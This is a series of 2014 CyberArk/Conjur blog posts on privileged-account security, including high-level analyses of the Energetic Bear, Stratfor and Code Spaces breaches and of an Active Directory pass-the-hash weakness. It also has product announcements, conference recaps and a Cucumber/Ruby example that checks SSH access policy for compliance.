The overall take away from this year’s survey? Whether attacks start with a malicious insider, or a rogue outside group/person, stealing and exploiting valid privileged credentials is critical to the success of the attacks. If your organization wants to gain an edge in stopping advanced attacks – start by locking down the privileged pathway all attackers take.

[Chart: attack stages rated hardest to detect, respond to and stop]

 

]]>
Introducing and Explaining Conjur https://www.cyberark.com/blog/introducing-and-explaining-conjur/ Mon, 28 Jul 2014 12:28:00 +0000 https://cyberarkvx2.wpengine.com/blog/introducing-and-explaining-conjur/  

DevOps and Compliance: Introducing Conjur

Over the past two months, Conjur has seen a tremendous uptick in the number of devops and compliance users who are exploring the platform’s potential and upgrading their authz strategies within their cloud infrastructure. We couldn’t be more excited — and we are incredibly proud to have teams like Netflix working with us, changing the face of authorization as a service.

Conjur is sometimes described as the “Active Directory for the cloud” owing to its simple and robust user, group, and layer permissioning system. As more teams and devops experts start using Conjur, we wanted to offer an easy way to explain what we do, and so we’ve created a quick video describing some of Conjur’s abilities and uses.

Ready to explore Conjur yourself? Great! If you have any questions, drop us a line at info@conjur.net!

 

 

]]>
Simple Guide to HIPAA Compliance https://www.cyberark.com/blog/simple-guide-to-hipaa-compliance/ Thu, 24 Jul 2014 12:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/simple-guide-to-hipaa-compliance/  

Cloud HIPAA Compliance with Conjur

HIPAA compliance is a common requirement for organizations who are moving infrastructure, workflows, and business processes to the cloud. Accordingly, there are requirements for managing access to appliances, databases, and devices, as well as for controlling permissions to access and modify data, that must be complied with. Ensuring full visibility for audits and regulatory adherence can be a massive undertaking, and shifting PHI and sensitive data to the cloud is often viewed with a combination of trepidation and resistance.

But does it have to be this way?


An article from 2013 disputes the common idea that housing, analyzing, and sharing (in this case specifically genomic) data in the cloud has more breach risk than hosting on-prem. The primary sources of data breaches reported to the Department of Health and Human Services were, interestingly, via “loss or theft of an electronic device” such as a laptop or flash drive with unencrypted data.

Obviously, this particular loss vector is removed by moving protected information to the cloud. Doing so introduces new risks of its own, but unlike a lost laptop these can be addressed through operations and management, reducing the scope for human error.

Conjur can help implement these operational and automated HIPAA compliance processes. As a recent post points out, the terms can be muddled and confusing, but we have put together a HIPAA Resource Sheet to help address and clarify where and how to map our authz platform to your HIPAA requirements.

Conjur understands the requirements of HIPAA and can help you understand and fill the gaps in your system.

 

 

]]>
Meet the Energetic Bear https://www.cyberark.com/blog/meet-energetic-bear/ Wed, 23 Jul 2014 14:34:36 +0000 https://www.cyberark.com/?p=3757

By Shiri Licht

Recently, Symantec reported that Russian hackers are after western oil and gas companies. According to the coverage, the attackers are targeting energy grid operators, major electricity generation firms, petroleum pipeline operators, and energy industry industrial equipment providers located in the US, Spain, France, Italy, Germany, Turkey, Poland and more. Energetic Bear, also known as Dragonfly, is the name given to a campaign attributed to a group of Russian hackers who have been in operation since at least 2011 and have mainly targeted the energy sector and related industries. We’ve talked at great length about why attackers tend to target Industrial Control Systems (ICS) used in critical infrastructure; while these organizations understand that they are targets, it is difficult for them to protect themselves.

Our research team at CyberArk Labs has analyzed how the Energetic Bear attackers operated. Like other breaches of its kind, they were looking to use the privilege escalation pathway to make themselves de facto “insiders” on a network. Using our privilege escalation model, we’ve outlined the attack below. The cycle comprises three stages: gaining an initial access point, retrieving privileged credentials, and using those credentials to reach the attackers’ goals:

The Energetic Bear in the Privilege Escalation Cycle:

Privilege Escalation Cycle

Initial Breach and Access Point:
As we’ve seen in many other publicized breaches, the Energetic Bear infiltrates networks through known means, using both phishing and watering hole attacks. In this case, the group also employed an interesting method – they compromised a number of ICS software providers and infected their software with malware. When the ICS software was updated during normal operations, connected machines got infected with the malware. This was only the beginning.

Retrieval of Credentials:
Next, the attackers went for the most coveted asset in an attack – privileged accounts or credentials. To do this they used two main tools with credential-stealing and remote access capabilities. A Remote Access Tool (RAT) is malware that enables the attacker to connect and interact with the infected machine. RATs often have additional capabilities and in this case these included various means to steal credentials. The two tools in this attack were:

  • Backdoor.Oldrea (“BD Oldrea”), also known as Havex – the backdoor is a “light” tool with minimal capabilities. Its main use is to maintain the attackers’ presence in the network and allow installation of more complex malware on the infected machine. A recent finding regarding the Havex malware shows that this tool actively scans for OPC servers, which broker access to the control devices in critical infrastructure networks.
  • Trojan.Karagany – Karagany runs modules, including ones that collect credentials and take screenshots.

Usage of Credentials:
When the attack was discovered, it seems the attackers were setting up the infrastructure for further attack. The tools used made it possible for the attackers to steal credentials, and gather system information, including lists of files, programs installed, roots of available drives, data from the computer’s Outlook address book and VPN configuration files. The stolen credentials would enable the attackers to deepen their penetration, impersonate legitimate insiders and employ privileged accounts to entrench themselves in the network.
In our next post, we’ll discuss mitigation techniques.

]]>
Rethinking Active Directory for the Cloud https://www.cyberark.com/blog/rethinking-active-directory-for-the-cloud/ Thu, 17 Jul 2014 12:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/rethinking-active-directory-for-the-cloud/  

Active Directory for the Cloud – The Conjur Solution

Earlier this week, security firm Aorato “identified a new threatening flaw within Active Directory that enables attackers to change a victim’s password, despite current security and identity theft protection measures”.

In essence, this flaw has more to do with how Active Directory is designed than with a bug. An attacker who obtains a user’s NT hash (the unsalted MD4 of the password that NTLM stores and uses) can authenticate with it without ever learning the password. It is a pass-the-hash attack, but one that (a) works in a default AD configuration, (b) leaves no distinctive log entry, and (c) works even when Kerberos is in use, because Kerberos’ RC4-HMAC encryption type uses the NT hash directly as the user’s long-term key: a stolen hash is enough to obtain Kerberos tickets (often called overpass-the-hash) and, in Aorato’s demonstration, to change the victim’s password.

Stepping back, what does this mean?


One perspective is that this flaw is indicative of how poorly Active Directory is aligned with the rapidly expanding set of devices, services, and platforms that make up the modern infrastructure stack many companies are moving to. The combination of legacy technical choices and weak logging means that as the threat surface expands, AD struggles to provide robust authn and authz. In other words: Active Directory is a legacy tool, and while essential for many organizations today, it should be carefully reconsidered, and where appropriate replaced, when IT and DevOps teams move some or all of their infrastructure to the cloud.

In doing so, there is an opportunity to break down and rebuild both the authn and authz model. Unlike Active Directory, this new model should comprise three elements:

  • Extensibility — unlike the network model that existed when AD was designed, the modern network is highly dynamic, with rapid system, service, and server provisioning and deprovisioning; by federating authn and centralizing authz, environmental change can be sustained without creating single points of failure (as happened with AD in this case)
  • Auditability — relying exclusively on external logging leaves auth blind spots; wherever a user or service accesses a component under management, the authz system’s permission rules should broker that access and also log the event in an immutable datastore.
  • Security — modern development practices and the avoidance of legacy support requirements (such as the RC4-HMAC/NT-hash coupling that AD’s Kerberos carries for backward compatibility with Windows NT) reduce the likelihood of built-in weaknesses

As organizations drive innovation and change in their own IT and development teams, they typically shift their architecture focus to the cloud. This creates an opportunity to set aside legacy technologies like Active Directory, which do not map to this new infrastructure stack, and in doing so create a more robust, secure, and cloud-native authz system.

 

]]>
Netflix Selects Conjur for Cloud Native Authz https://www.cyberark.com/blog/netflix-selects-conjur-for-cloud-native-authz/ Mon, 14 Jul 2014 13:02:00 +0000 https://cyberarkvx2.wpengine.com/blog/netflix-selects-conjur-for-cloud-native-authz/  

Netflix Infrastructure Team Selects Conjur

We are tremendously excited to announce that the Netflix infrastructure team has selected Conjur as its cloud-native authorization (authz) as a service provider, part of a broader initiative around their aggressive “10x plan” to shift their entire operational IT infrastructure to the public cloud.

Netflix is an amazing company to work with. Well regarded within the technology world for their (now famous) culture deck, their belief in the principles of freedom and accountability described within it has been evident from our first conversations.

Of equal importance is their foundational understanding of the role of technology (including Conjur), which informs how they see the architectural and technical decisions regarding the design and implementation of what we see as the “new public cloud stack”.

As Mike Kail, who heads up IT Operations for Netflix, describes it in the case study, with Conjur the “rapid adoption of seamless Ops and Development technologies, the kind that do not disrupt the workflows of your people but instead help them be more innovative and move faster, is achievable today.”


We could not have described more succinctly or accurately what we think authz for the cloud means. Mike and Netflix have an awareness of innovation at speed and how IT enables it; this is an idea we embrace at Conjur at all levels.

Earlier this month, over the Fourth of July holiday, Elizabeth sent around a note to the team that articulated this succinctly:

“There is a revolution underway. Cloud, mobility, the ideas of DevOps: we are part of an industry in the midst of change.

What that means is that there are a lot of very smart people in technology roles struggling with the infrastructure that surrounds them. Pushed by the desire for innovation, they are looking for ways to grow their businesses and empower their teams, meet greater challenges, and do it all while minimizing business risk.

These are our customers and peers. They understand, natively, that “failure is not an option”. That is why we are here; Conjur exists to provide a safe environment for people to build innovative products, disrupt the industries in which they operate, embrace the cloud, and remain competitive.

Most people don’t know what the other side of this revolution looks like, yet. Our mission, through our product, culture, and actions, is to show them.”

So, how about you? Are you building a “new cloud stack”, and driving innovation at your organization? Do you have a cloud-first mandate?

 

]]>
Getting To Cloud Native Authz https://www.cyberark.com/blog/getting-to-cloud-native-authz/ Fri, 11 Jul 2014 13:24:00 +0000 https://cyberarkvx2.wpengine.com/blog/getting-to-cloud-native-authz/  

Cloud Native Authz

At the AWS Summit in New York City this week, one of the major themes woven into the keynote (as well as many of the other presentations) was the idea that companies and the people within them who truly understand the value of DevOps/continuous integration/disruptive innovation should be seeking “cloud native” partners, vendors, and platforms.

In part, cloud nativity is simply a pointer, indicative of organizations who build, think, and execute differently from their peers who were born in a different era. It is, in other words, a means of identifying those organizations that believe in (or at least buy into) the same conceptual framework.

We like to believe that we (and Conjur the product) are “cloud native”. As Elizabeth often points out, our earliest roots are born in frustration when innovation at a previous employer was hampered by a lack of cloud-ready authorization services – a problem we are 100% focused on solving. Part of the challenge in doing so is that many of our friends in the industry are still figuring out how to describe the differences between authentication and authorization (see our recent blog on this subject.)

More broadly challenging is that DevOps and cloud-first initiatives are terra incognita for most companies who were not founded within the last few years. Cloud computing, especially at the infrastructure level, is fundamentally changing how organizations source, host, and manage applications, data, and workflow, and finding vendors and solutions that are built with this new infrastructure in mind can be daunting; many companies hack together solutions where vendors have not yet provided them, or where the requirements that reflect a truly well-designed solution are not yet clearly defined.


Of course, that’s not a great way to handle something as mission-critical as authorization. In claiming that Conjur is “cloud native authz”, we are looking to help clarify how to think about and manage authorization in the new infrastructure stack – something that we have heard called the Cloud OS from vendors like Microsoft, and which others refer to as the “cloud stack” (see, for example, Amazon’s new Zocalo announcement, broadly focused on an enterprise-friendly use case for cloud storage) – without relying on hacks and kludges.

In a nutshell, we believe that any robust “cloud native authz” platform should embody three characteristics:

  • Extensibility: The platform selected should quickly adapt to a wide and (at best) loosely defined set of different infrastructure and platform decisions; organizational needs will change over time, and no assumptions should be made regarding what the environment will look like from month to month, or even day to day. Any authorization platform used should be capable of abstractly supporting any platform/system in order to remain relevant and usable across even foundational architecture changes.
  • Efficiency: Core authorization concepts (tokens, user-to-server and service-to-service management, etc.) all need to be implemented securely; look for a solution that doesn’t require extensive in-house coding or scripting of these core features, and is ready to use out-of-the-box. Avoid the temptation to build something entirely in-house, as it creates a long tail of support as well as a significant up-front development cost (or worse, an unknown cost as scripts, configuration management systems, and repositories are shoehorned into roles that directly contradict their fundamental design objectives).
  • Scalability: Assuming that organizations that are looking for “cloud native” solutions are also believers in continuous integration and rapid iteration philosophies, the authz provider they select must be capable of coping with rapid and high-volume change in very short timeframes; look for solutions with robust master/follower architectures that can both provide a single system of record and a rapid distribution model for public information (without relying on, for example, configuration management tools to do so).

There are likely more bullets to be added to this list over the coming months. Topics such as native auditability (which Conjur supports out of the box, removing the need to hand-crank audit reports as most organizations do today), a finer distinction between deployment time for development vs. operations (again, Conjur is ready to use almost immediately for both departments), and end-to-end automation are still being worked out with our customers, but we believe there is a growing consensus around what well-built cloud native authz will look like.
This is a tremendously exciting and quickly evolving space, and we’d love to hear what you’re seeing, struggling with, and succeeding at within it.

Drop us a line, or have a look at our one-page sheet describing how Conjur works today.

]]>
Geopolitical Intelligence Firm Yields 90,000 Credit Card Accounts https://www.cyberark.com/blog/geopolitical-intelligence-firm-yields-90000-credit-card-accounts/ Thu, 03 Jul 2014 22:47:25 +0000 https://www.cyberark.com/?p=3528

A confidential report from the Verizon investigations team detailing the 2011 Stratfor cyber-attack and data breach has recently leaked to the press.

Stratfor is a geopolitical intelligence firm that, from a data-handling standpoint, operates much like a retailer: it sells “strategic analysis and forecasting to individuals and organizations around the world.” In 2011, the hackers stole more than five million sensitive emails, which ended up published by WikiLeaks.

The hackers also said they had details for more than 90,000 credit card accounts. Among the organizations listed as Stratfor clients: Bank of America, the Defense Department, Doctors Without Borders, Lockheed Martin, Los Alamos National Laboratory and the United Nations.

What the Verizon investigation showed is how prevalent privileged account abuse was to this breach. According to the Verizon report:

  • Stratfor allowed insecure and unmonitored remote access (RDP and SSH) that was left permanently enabled.
    • For example, web and database servers were reachable from the Internet, and admin access to these systems was designed to be available both internally and externally; Stratfor IT personnel did not know this. Employees routinely used these powerful accounts from home, the office, and anywhere else.
    • To compound matters, all remote access used single-factor authentication.
  • The attackers breached the SMTP server through SSH using employee credentials, showing that they already knew the password and only needed to brute-force the account name.
  • Once inside, the attackers were able to reach troves of customers’ credit card details, documents and email, including credit card data on the database servers that was stored unencrypted.

Basic security steps could have significantly reduced risk of this breach, including:

  • Securing remote access – privileged session management is a critical requirement for any security-conscious organization. Companies need to isolate, control and monitor privileged user access and activity. The session manager acts as a jump server, providing a single access control point, preventing malware from jumping from the user’s machine to the target system, and recording every keystroke and mouse click for continuous monitoring.
  • Credentials management – the report states that “a password management policy does not exist within Stratfor.” Several unused accounts were present on each of the examined systems, and several accounts were shared by multiple users. There was not even a policy preventing users from reusing the same password for company email and for remote access to servers holding sensitive information.
  • Eliminating privilege escalation – the attackers escalated from a low-privilege personal user account to root on the servers they accessed. By controlling privileged accounts, Stratfor could have stopped the attack early in its life cycle.

Once again, privilege turns out to be the key to lateral movement once an attacker has breached the perimeter, enabling the most damage to be done. Other examples include the MobileIron breach, the BlackPOS attack on retailers, Edward Snowden and the U.S. tax return crime wave breaches. Given the preponderance of privilege-based attacks, revisiting best-practice security procedures is worth a look. Check out our paper, The Three Phases of Securing Privileged Accounts.

]]>
Healthcare has the Most Difficult Privilege Problem to Solve https://www.cyberark.com/blog/healthcare-difficult-privilege-problem-solve/ Wed, 02 Jul 2014 13:34:20 +0000 https://www.cyberark.com/?p=3494

On the black market, a full identity profile contained in a single Electronic Medical Record (EMR) can bring as much as $500, according to Politico. HIMSS Analytics reported in June that 83 percent of healthcare organizations use the Cloud to store EMRs. Meanwhile, SANS reported that nearly 50,000 malicious events were recorded between September 2012 and October 2013. And last week, the personal information for 1.3 million people was compromised from a hacked server in Montana’s Department of Public Health infrastructure.

The healthcare industry is a prime target for advanced attacks given the vast repositories of very personal information every hospital maintains. What is reported in the news is mainly breach events; however, a very thorough study conducted by Essentia Health dives into diagnosing the underlying problem.

Scott Erven, manager of Information Security at Essentia Health, was given free rein to roam through all of the medical equipment used at a large chain of Midwest healthcare facilities. The study spanned two years, and Erven and his team found, “drug infusion pumps–for delivering morphine drips, chemotherapy and antibiotics–that can be remotely manipulated to change the dosage doled out to patients; Bluetooth-enabled defibrillators that can be manipulated to deliver random shocks to a patient’s heart or prevent a medically needed shock from occurring; X-rays that can be accessed by outsiders lurking on a hospital’s network; temperature settings on refrigerators storing blood and drugs that can be reset, causing spoilage; and digital medical records that can be altered to cause physicians to misdiagnose, prescribe the wrong drugs or administer unwarranted care.”

How is this possible? In his research, Erven found three prominent security holes across the healthcare facility’s networks and devices:

  • Lack of authentication to access or manipulate the equipment
  • Weak passwords or default and hardcoded vendor passwords (privileged accounts) like “admin” or “1234”
  • And embedded web servers and administrative interfaces that make it easy to identify and manipulate devices once an attacker finds them on a network

The most startling discovery Erven’s team made is how unaware of these major security issues hospitals, healthcare organizations and medical technology vendors seem to be. According to Erven, “vendors don’t have any type of security programs in place, nor is it required as part of pre-market submission to the [Federal Drug Administration].”

The healthcare industry, as a whole, must wake up to the power of privilege and understand the dangers these accounts pose. Discovering, managing and protecting this critical security layer is a must for the industry or the safety of patients and the reputation of the organization could very well suffer.

]]>
In The News: CyberArk Wins Best Secure Access Solution in Asia https://www.cyberark.com/blog/news-cyberark-wins-best-secure-access-solution-asia/ Tue, 01 Jul 2014 18:03:55 +0000 https://www.cyberark.com/?p=3482

We’ve had a flurry of high-profile, global award wins to announce lately. Our CEO, Udi Mokady, was recently named the Ernst & Young Entrepreneur of the Year for Technology Security, and last month the CyberArk Privileged Account Security Solution won Best Advanced Persistent Threat (APT) Protection from the SC Magazine Awards Europe.

Today, we’re proud to share that the CyberArk Privileged Account Security Solution won big again and was named Best Secure Access Solution by the 2014 Network World Asia Information Management Awards.

This is an exciting win for us as it further validates our impact on the global security market—protecting the heart of the enterprise for customers the world over.

Privileged account credentials are the ‘keys to the IT kingdom’ and the focal point for every attacker to move throughout an organization’s technology infrastructure. This award underscores the increasing realization of how critical it is to secure privileged accounts and acknowledges the value CyberArk is providing IT departments day-in and day-out.

]]>
Automate Compliance with BDD Tools https://www.cyberark.com/blog/automate-compliance-with-bdd-tools/ Mon, 30 Jun 2014 13:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/automate-compliance-with-bdd-tools/  

Ever heard of Cucumber? I don’t mean the fruit which, when placed in vinegar, turns into a pickle.

Implementing secure policies and safeguards into a development process — keeping passwords and credentials out of code, for example — is a critical first step towards meeting compliance guidelines and regulations. Doing so is only half of the battle, however; you also need to be able to document and prove that these systems are in place and effective.

Doing so can be tedious, expensive, and time-consuming. The decision to invest in automation for software development and delivery capabilities is typically made to eliminate bottlenecks like this; wouldn’t it be great if you could leverage DevOps technologies to automate compliance-related documentation?

In fact, you can, by implementing Behavior-Driven Development (BDD).

BDD is a software development technique that combines the basis of test-driven development with aspects of evolving models. BDD technologies facilitate meeting technical documentation objectives for regulatory compliance purposes. BDD was originally developed to aid communication between stakeholders and software developers through a shared tool and process, understandable by both.

There are a number of BDD tools readily accessible including FIT, Fitnesse, and Cucumber [1].

In this example, we will use Cucumber, an open-source software validation system which translates requirements written in plain English into working test cases. It’s easy for non-technical audiences to understand and it’s structured enough to be a solid framework for engineers to use. Consequently, Cucumber is increasingly being applied to operations as well, often for doing things like verifying SSH installations and firewall settings on servers in the infrastructure stack.

Part of the value of using “cukes” is the increased visibility into the value and reasoning behind each script in an environment, which can then be easily communicated to all stakeholders, auditors, and operations personnel on demand.


In much the same way as software requirements are written and communicated within Engineering, Cucumber makes it easy to author and expose compliance controls in plain English across an organization. Each such control is written as a condition which an organization must fulfill in order to be “in compliance”. These can be directly translated into a series of Cucumber “Scenarios”, written in an English-like syntax (called Gherkin).

An execution engine evaluates whether each scenario is working in the intended way using clearly worded statements of the desired outcome.

Let’s walk through an example using Cucumber to verify an example system’s SSH configuration. This example is applicable to IT environments such as those falling under HIPAA, SOX, and numerous other regulatory frameworks. For this example we will be using the NIST control PR.AC-4: Access permissions are managed, incorporating the principles of least privilege and separation of duties.

Start by describing the compliance objective statement in plain text. The compliance control should be understandable by developers, operations personnel, business and regulatory stakeholders alike.

<code>Feature:
 In order to comply with NIST PR.AC-4 [<---insert your compliance reg here]
 As an IT systems administrator
 I want to demonstrate that only authorized users have SSH access to virtual machines in a controlled cloud IT environment</code>

Then set up the scene, what you already have in place or plan to have in place.

<code>Background:
 Given a "Compliant" server [<-------insert your regulatory framework here, for example, a server that's using Conjur]
 And a "developers" user group
 And an "ops" user group</code>

Lastly, describe the passing scenarios.

<code>Scenario: Developers do not have ssh access to the controlled IT area
 Given I belong to the "developers" group
 When I ssh to the server
 Then access is denied (or restricted such that the developer does not have sudo access)
 And the login attempt is recorded

Scenario: Ops personnel have ssh access to the controlled IT area
 Given I belong to the "ops" group
 When I ssh to the server
 Then access is granted
 And the login is recorded</code>

From here, a developer could write the step definitions in Ruby and run the feature, which fails at first because nothing implements the steps. In response, she could write the code that leads to a passing state, and repeat until all necessary steps are written and green. (Additional tests might be required to fully comply with the NIST framework as written, but they are out of scope for this example.)
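Step definitions for the scenarios above, as an added example that is not code from the original post or from Conjur. They evaluate a constructed sshd_config fragment (its AllowGroups directive) against constructed group memberships, and the file carries a small stand-in for Cucumber's step registry and runner so it executes without the cucumber gem; against a real server the "When" step would invoke ssh and the recording step would read the server's auth log.

```ruby
# Added example (not from the original post): Cucumber-style step definitions for
# the SSH scenarios, with a small stand-in runner so the file works without the gem.
# Constructed sshd_config: only the ops group is admitted and every attempt is logged.
SSHD_CONFIG = <<~CONF
  PermitRootLogin no
  AllowGroups ops
  LogLevel VERBOSE
CONF
GROUPS = { "developers" => %w[alice], "ops" => %w[bob] }.freeze  # constructed members
# AllowGroups as sshd evaluates it: when present, the user needs one listed group.
def ssh_access_allowed?(config, user_groups)
  directive = config.lines.map(&:split).find { |words| words.first == "AllowGroups" }
  return true if directive.nil?      # no AllowGroups directive: any valid user may log in
  (directive.drop(1) & user_groups).any?
end

# Simulated login; every attempt is appended to the audit trail the Then steps inspect.
def attempt_ssh(user, audit, config: SSHD_CONFIG, groups: GROUPS)
  user_groups = groups.select { |_, members| members.include?(user) }.keys
  granted = ssh_access_allowed?(config, user_groups)
  audit << { user: user, groups: user_groups, result: granted ? "accepted" : "denied" }
  granted
end

# Stand-in for Cucumber's step registry: Given/When/Then/And all register a step.
STEPS = []
def step(pattern, &block); STEPS << [pattern, block]; end
%w[Given When Then And].each { |kw| Object.send(:alias_method, kw, :step) }
# Step definitions; instance variables belong to the scenario's world object.
Given(/^I belong to the "([^"]+)" group$/) { |group| @user = GROUPS.fetch(group).first }
When(/^I ssh to the server$/) { @granted = attempt_ssh(@user, @audit) }
Then(/^access is denied/) { raise "#{@user} should have been denied" if @granted }
Then(/^access is granted$/) { raise "#{@user} should have been admitted" unless @granted }
Then(/^the login( attempt)? is recorded$/) do |_|
  raise "no audit record for #{@user}" unless @audit.last && @audit.last[:user] == @user
end
# Runs one scenario's step lines; an undefined or failing step raises.
def run_scenario(step_lines)
  world = Object.new
  world.instance_variable_set(:@audit, [])
  step_lines.each do |line|
    text = line.sub(/\A(Given|When|Then|And|But) /, "")
    pattern, block = STEPS.find { |pat, _| pat.match?(text) }
    raise "undefined step: #{text}" unless pattern
    world.instance_exec(*pattern.match(text).captures, &block)
  end
end

# Splits a feature into scenarios and reports the outcome per scenario name.
def run_feature(feature_text)
  feature_text.split(/^\s*Scenario: /).drop(1).each_with_object({}) do |chunk, results|
    name, *steps = chunk.lines.map(&:strip).reject(&:empty?)
    begin
      run_scenario(steps)
      results[name] = "passed"
    rescue StandardError => e
      results[name] = "failed: #{e.message}"
    end
  end
end

# The two scenarios from the feature above ("When" marks the action step).
FEATURE = <<~GHERKIN
  Scenario: Developers do not have ssh access to the controlled IT area
    Given I belong to the "developers" group
    When I ssh to the server
    Then access is denied (or restricted such that the developer does not have sudo access)
    And the login attempt is recorded
  Scenario: Ops personnel have ssh access to the controlled IT area
    Given I belong to the "ops" group
    When I ssh to the server
    Then access is granted
    And the login is recorded
GHERKIN
puts run_feature(FEATURE)
```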

With a BDD tool and Conjur working together, organizations can both define and demonstrate enforcement of compliance-related policies and easily share the objective evidence of having both in place and being adhered to.

Want to learn more about how Conjur can support formal compliance requirements, provide access intelligence, and help organizations manage authorization at scale? Get started today with a free trial, and we will be happy to walk you through the process!


]]>
Access Intelligence – The Infographic https://www.cyberark.com/blog/access-intelligence-the-infographic/ Fri, 27 Jun 2014 13:52:00 +0000 https://cyberarkvx2.wpengine.com/blog/access-intelligence-the-infographic/  

Access Intelligence and Conjur

We recently had a conversation with some friends in the DevOps community about how they were implementing continuous integration ideas into their systems and teams, and how they were thinking about their authorization (authz) and authentication (authn) strategies as part of that process. These are some of the brightest engineers in the industry, and without exception, every one of them expressed how vital configuration management automation tools (e.g., Chef, Puppet, Ansible, and SaltStack) were in making these initiatives successful.

Coming out of that discussion, we compared notes. Everyone in our group had jotted down the same three basic ideas for managing security in a DevOps-friendly way, and everyone agreed that they clearly underscored why Conjur should be a fundamental part of any deployment of these tools.

Check out our infographic, Access Intelligence Best Practices, which outlines what we learned.


Are you automating your IT operations? Learn more about how Conjur provides the essential access intelligence needed to secure DevOps.


]]>
Velocity Day 1 – Recap, Refresh, and Recaffeinate! https://www.cyberark.com/blog/velocity-day-1-recap-refresh-and-recaffeinate/ Wed, 25 Jun 2014 14:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/velocity-day-1-recap-refresh-and-recaffeinate/  

Conjur – Velocity 2014 Santa Clara

Conjur had a fantastic first day at Velocity Santa Clara!

The conference started small on Tuesday morning, with plenty of time to meet fellow attendees in the more intimate group settings of the breakout sessions. Kevin and Elizabeth started on different tracks; some of their notes from the field:

Elizabeth

I joined Andrew Shafer’s “How Did Your Organizational Learning Game Come Up?” and it was fantastic! The session was three hours long, and unlike other sessions where the audience just sits passively as people talk, Andy kept things very interactive. We were asked to walk around, get into small groups, thumb wrestle, and perform team juggling with our new friends! I was able to connect with folks from a wide variety of organizations, and it took some of the edge off meeting and talking to unfamiliar faces.

Kevin

I attended the “Battle-tested Code Without the Battle – Security Testing and Continuous Integration” and “Introduction to Docker: Containerization Is the New Virtualization” sessions, which were both technically deep and very informative, covering the ins and outs of some of the coolest front-line tech in the DevOps world. I also really enjoyed the Chef Hack-a-thon! We took the afternoon off to organize ourselves and our schedules, and then returned to the conference for the Poolside Mixer, Ignite Velocity, and the Late Night Reception. We were out until 2am PST chatting with our new friends (in other words, Conjur’s Late Night Reception presence was brought to you by caffeine).

Kevin’s insights into winning friends and influencing DevOps people at Velocity.


We are excited to see what Wednesday will bring! Both Kevin Gilpin (CTO and co-founder @kegilpin) and Elizabeth Lawler (CEO and co-founder @ElizabethLawler) will be on the show floor, in sessions, and out and about all day Wednesday. Come say hello, or let us know if you’d like to meet up.

Conjur is the world’s leading access intelligence and authorization management solution. Try for free for 15 days!


]]>
We are at Velocity 2014! https://www.cyberark.com/blog/we-are-at-velocity-2014/ Tue, 24 Jun 2014 14:50:00 +0000 https://cyberarkvx2.wpengine.com/blog/we-are-at-velocity-2014/  

Velocity and Conjur – Day 1

Conjur is at Velocity 2014 in Santa Clara, and we would love to meet you while we’re there!


We’re tremendously excited to be part of the discussion around how the world’s leading organizations are building a better and faster web. Along with our friends, peers, and customers in the DevOps community, we will be attending a number of sessions and events all week. We would love to connect and talk more about how to solve the authorization and access management challenges that today’s web ops and performance professionals are facing as they build out their infrastructure and scale their businesses.

Both Kevin Gilpin (CTO and co-founder) and Elizabeth Lawler (CEO and co-founder) will be on the show floor, in sessions, and at the Amplify party in the Chairman’s Suite on Tuesday evening from 9pm-12am. Come say hello!

Conjur is the world’s leading access intelligence and authorization management solution. Try for free for 15 days!


]]>
The Importance of Access Intelligence – Code Spaces Shutdown as an Object Lesson https://www.cyberark.com/blog/the-importance-of-access-intelligence-code-spaces-shutdown-as-an-object-lesson/ Thu, 19 Jun 2014 14:57:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-importance-of-access-intelligence-code-spaces-shutdown-as-an-object-lesson/  

As many of our friends and customers in the cloud and devops world know, Git and Subversion provider Code Spaces has gone offline, presumably permanently, as a result of a combined DDoS and malicious deletion of data attack levied against their Amazon Web Services accounts.

First and foremost, we extend our sympathies and condolences to anyone adversely impacted, from the team at Code Spaces to their customers, many of whom lost not only a provider but likely data as well. This is, in the words of some of the journalists who are covering the story, a “nightmare scenario” around cloud security.

It is also a wake-up call. There are significant warning signs in the Code Spaces attack that the rest of us need to learn from, identify in our own organizations, and take steps to remediate. Among them:

  • Ensure least privilege access controls are in place. One of the primary problems with the Code Spaces attack was that even as the attack was occurring, the team was unable to lock down their AWS environment because the attacker held root AWS account access. Accounts had been created across the board, and the malicious party (who is still unidentified) was able to use them to access and modify the AWS environment, bypassing initial response attempts. The root account should be used “in case of emergency” and access should be strictly limited, with strong separation of duties among the various infrastructure team members.
  • Embrace and implement defense in depth. The EC2 panel was a single point of failure, and when it was breached, it yielded access to the entire Code Spaces data stack: production systems, backup data, customer information, and so on. Had a properly segmented, independently protected set of user and system authentication and authorization systems been in place, it would have been much more difficult for an attacker to have done as much damage (or to have wreaked havoc so quickly).
  • Think “access intelligence”, not just “access management”. Complementing access management technologies (SSO, primarily) with access intelligence systems that are capable of protecting access to critical infrastructure can help to avoid this type of vulnerability. A singular reliance on authentication systems as guardians of the AWS console, even with 2FA, does not fully mitigate the risk associated with unauthorized access to AWS console accounts and their related assets. And there are many “other doors” into cloud-hosted systems such as Code Spaces’.


As an industry and as security professionals, we need to recognize that there is a foundational difference between how data is protected when it resides in an environment that we own and control, and when it resides in cloud systems (be it AWS or Azure, Rackspace or Google’s Cloud Platform) where we cannot simply unplug and manage a response offline.

The analyst community has been shifting their focus towards a “zero trust” model for handling privileges and responding to cyberthreats. As dramatic as Code Spaces’ failure was when compared against even the most sharply written research, perhaps we would all do well to spend some time reviewing their recommendations and asking if we’re applying them to our own cloud environments.

If you want to learn more about how to implement access intelligence in your cloud environment, we would be happy to help. Drop us a line at info@conjur.net.


]]>
Docker Security – Externalizing Secrets with Conjur https://www.cyberark.com/blog/docker-security-externalizing-secrets-with-conjur/ Tue, 17 Jun 2014 18:03:00 +0000 https://cyberarkvx2.wpengine.com/blog/docker-security-externalizing-secrets-with-conjur/  

We have a lot of customers who are excited by Docker, which has prompted us to explore how Docker and Conjur fit together.  In case you’ve been living on the moon, Docker is a technology which allows applications to be packaged into portable containers and then rapidly deployed onto servers or virtual machines. Each Docker container contains all the code and dependencies that an application needs to run, and the Docker runtime is efficient enough to run many containers on a single virtual machine.


Of course, a Docker container doesn’t contain everything that the application needs, because it’s a terrible security practice to build secrets like database passwords and SSL certificates into any deployable bundle (whether tarball, source code repository, Docker container, etc). Therefore, a Docker container must get its secrets from another source, such as the host operating system or a network service.

This situation got us to thinking about how Conjur Secrets can be used to power Docker containers. We talked over the use cases with our customers, and the result is our latest tutorial, Docker + Conjur Secrets, which shows how Conjur can provide Docker containers with secrets such as database passwords.

How it works

Here’s an example workflow. Alternative mechanisms are also available, with varying features and power. They are described more fully in the Tutorial.

1. A developer builds a new application or service

